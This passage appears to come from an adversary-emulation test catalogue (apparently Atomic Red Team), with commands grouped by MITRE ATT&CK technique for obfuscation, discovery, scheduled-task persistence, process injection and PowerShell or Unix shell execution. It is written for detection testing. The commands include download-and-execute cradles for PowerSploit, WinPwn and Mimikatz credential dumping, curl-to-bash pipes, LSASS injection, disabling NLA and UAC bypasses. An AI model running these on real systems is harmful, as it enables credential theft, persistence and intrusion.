cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"

powershellelevatedwindowsChanging RDP Port to Non Standard Port via Powershell

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}

command_promptelevatedwindowsChanging RDP Port to Non Standard Port via Command_Prompt

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}

command_promptwindowsDisable NLA for RDP via Command Prompt

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f

T1027 Obfuscated Files or Information · 11 tests

shmacos, linuxDecode base64 Data into Script

if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh

powershellwindowsExecute base64-encoded PowerShell

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand

powershellwindowsExecute base64-encoded PowerShell from Windows Registry

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"

command_promptwindowsExecution from Compressed File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over email

Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over HTTP

Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"

powershellwindowsObfuscated Command in PowerShell

$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

manualwindowsObfuscated Command Line using special Unicode characters

powershellelevatedwindowsSnake Malware Encrypted crmlog file

$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"

command_promptwindowsExecution from Compressed JScript File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"

powershellwindowsObfuscated PowerShell Command via Character Array

$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)

T1027.002 Software Packing · 4 tests

shlinuxBinary simply packed by UPX (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shlinuxBinary packed by UPX, with modified headers (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary simply packed by UPX

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary packed by UPX, with modified headers

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

T1033 System Owner/User Discovery · 7 tests

command_promptwindowsSystem Owner/User Discovery

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt

shlinux, macosSystem Owner/User Discovery

users
w
who

powershellwindowsFind computers where user has session - Stealth mode (PowerView)

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose

powershellwindowsUser Discovery With Env Vars PowerShell Script

[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append

powershellwindowsGetCurrent User with PowerShell Script

[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt

powershellwindowsSystem Discovery - SocGholish whoami

$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file

command_promptwindowsSystem Owner/User Discovery Using Command Prompt

set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%

T1036 Masquerading · 2 tests

powershellwindowsSystem File Copied to Unusual Location

copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5 
stop-process -name "cmd" | out-null

powershellwindowsMalware Masquerading and Execution from Zip File

Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null

T1036.005 Match Legitimate Resource Name or Location · 3 tests

shmacos, linuxExecute a process from a directory masquerading as the current parent directory

mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"

powershellwindowsMasquerade as a built-in system executable

Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"

powershellelevatedwindowsMasquerading cmd.exe as VEDetector.exe

# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"

Start-Sleep -Seconds 5

T1046 Network Service Discovery · 12 tests

bashlinux, macosPort Scan

for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done

shelevatedlinux, macosPort Scan Nmap

sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}

powershellelevatedwindowsPort Scan NMap for Windows

nmap #{host_to_scan}

powershellwindowsPort Scan using python

python "#{filename}" -i #{host_ip}

powershellwindowsWinPwn - spoolvulnscan

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput

powershellwindowsWinPwn - MS17-10

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput

powershellwindowsWinPwn - bluekeep

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput

powershellwindowsWinPwn - fruit

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput

shcontainersNetwork Service Discovery for Containers

docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh

powershellwindowsPort-Scanning /24 Subnet with PowerShell

$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}

powershellelevatedwindowsRemote Desktop Services Discovery via PowerShell

Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"

shelevatedlinux, macosPort Scan using nmap (Port range)

nmap -Pn -sV -p #{port_range} #{host}

T1053.005 Scheduled Task · 12 tests

command_promptelevatedwindowsScheduled Task Startup Script

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

command_promptwindowsScheduled task Local

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}

command_promptelevatedwindowsScheduled task Remote

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

powershellwindowsPowershell Cmdlet Scheduled Task

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

powershellwindowsTask Scheduler via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"

powershellelevatedwindowsWMI Invoke-CimMethod Scheduled Task

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

command_promptwindowsScheduled Task Executing Base64 Encoded Commands From Registry

reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}

powershellelevatedwindowsImport XML Schedule Task with Hidden Attribute

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

powershellwindowsPowerShell Modify A Scheduled Task

$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction

command_promptelevatedwindowsScheduled Task ("Ghost Task") via Registry Key Manipulation

"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon

command_promptelevatedwindowsScheduled Task Persistence via CompMgmt.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc

command_promptelevatedwindowsScheduled Task Persistence via Eventviewer.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"

T1055 Process Injection · 13 tests

powershellwindowsShellcode execution via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"

command_promptwindowsRemote Process Injection in LSASS via mimikatz

"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"

powershellwindowsSection View Injection

$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"

powershellwindowsDirty Vanity process Injection

Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe" #{pid}

powershellelevatedwindowsRead-Write-Execute process Injection

$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address

powershellwindowsProcess Injection with Go using UuidFromStringA WinAPI

$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug

powershellwindowsProcess Injection with Go using EtwpCreateEtwThread WinAPI

$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug

powershellwindowsRemote Process Injection with Go using RtlCreateUserThread WinAPI

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug

powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug

powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI (Natively)

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug

powershellwindowsProcess Injection with Go using CreateThread WinAPI

$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug

powershellwindowsProcess Injection with Go using CreateThread WinAPI (Natively)

$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug

powershellelevatedwindowsUUID custom process Injection

Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force

T1057 Process Discovery · 9 tests

shlinux, macosProcess Discovery - ps

ps >> #{output_file}
ps aux >> #{output_file}

command_promptwindowsProcess Discovery - tasklist

tasklist

powershellwindowsProcess Discovery - Get-Process

Get-Process

powershellwindowsProcess Discovery - get-wmiObject

get-wmiObject -class Win32_Process

command_promptwindowsProcess Discovery - wmic process

wmic process get /format:list

command_promptwindowsDiscover Specific Process - tasklist

tasklist | findstr #{process_to_enumerate}

powershellelevatedwindowsProcess Discovery - Process Hacker

Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"

powershellelevatedwindowsProcess Discovery - PC Hunter

Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"

command_promptwindowsLaunch Taskmgr from cmd to View running processes

taskmgr.exe /7

T1059 Command and Scripting Interpreter · 1 test

powershellwindowsAutoIt Script Execution

Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"

T1059.001 PowerShell · 22 tests

command_promptelevatedwindowsMimikatz

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

powershellwindowsRun BloodHound from local disk

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

powershellwindowsRun Bloodhound from Memory using Download Cradle

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

powershellelevatedwindowsMimikatz - Cradlecraft PsSendKeys

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

command_promptwindowsInvoke-AppPathBypass

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

command_promptwindowsPowershell MsXml COM object - with prompt

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

command_promptwindowsPowershell XML requests

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"

command_promptwindowsPowershell invoke mshta.exe download

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"

manualwindowsPowershell Invoke-DownloadCradle

powershellwindowsPowerShell Fileless Script Execution

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

powershellwindowsNTFS Alternate Data Stream Access

Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand

powershellelevatedwindowsPowerShell Session Creation and Use

New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

command_promptwindowsPowerShell Command Execution

powershell.exe -e  #{obfuscated_code}

powershellelevatedwindowsPowerShell Invoke Known Malicious Cmdlets

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

powershellwindowsPowerUp Invoke-AllChecks

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks

powershellwindowsAbuse Nslookup with DNS Records

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

powershellwindowsSOAPHound - Dump BloodHound Data

#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}

powershellwindowsSOAPHound - Build Cache

#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}

T1059.003 Windows Command Shell · 6 tests

powershellwindowsCreate and Execute Batch Script

Start-Process "#{script_path}"

command_promptwindowsWrites text to a file and displays it.

echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"

command_promptwindowsSuspicious Execution via Windows Command Shell

%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}

powershellwindowsSimulate BlackByte Ransomware Print Bombing

cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null

command_promptwindowsCommand Prompt read contents from CMD file and execute

cmd /r cmd<"#{input_file}"

command_promptelevatedwindowsCommand prompt writing script to file then executes it

 c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs

T1059.004 Unix Shell · 17 tests

shlinux, macosCreate and Execute Bash Shell Script

sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}

shlinux, macosCommand-Line Interface

curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash

shlinuxHarvest SUID executable files

chmod +x #{autosuid}
bash #{autosuid}

shlinuxLinEnum tool execution

chmod +x #{linenum}
bash #{linenum}

shlinuxNew script file in the tmp directory

TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE

shlinuxWhat shell is running

echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi

shlinuxWhat shells are available

cat /etc/shells

shlinuxCommand line scripts

for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done

shlinuxObfuscated command line scripts

[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART

bashelevatedlinuxChange login shell

[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art

shlinuxEnvironment variable scripts

export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh

shlinuxDetecting pipe-to-shell

cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt

shlinuxCurrent kernel information enumeration

uname -srm

shlinux, macosShell Creation using awk command

awk 'BEGIN {system("/bin/sh &")}'

shlinux, macosCreating shell using cpan command

echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan

shlinuxShell Creation using busybox command

busybox sh &

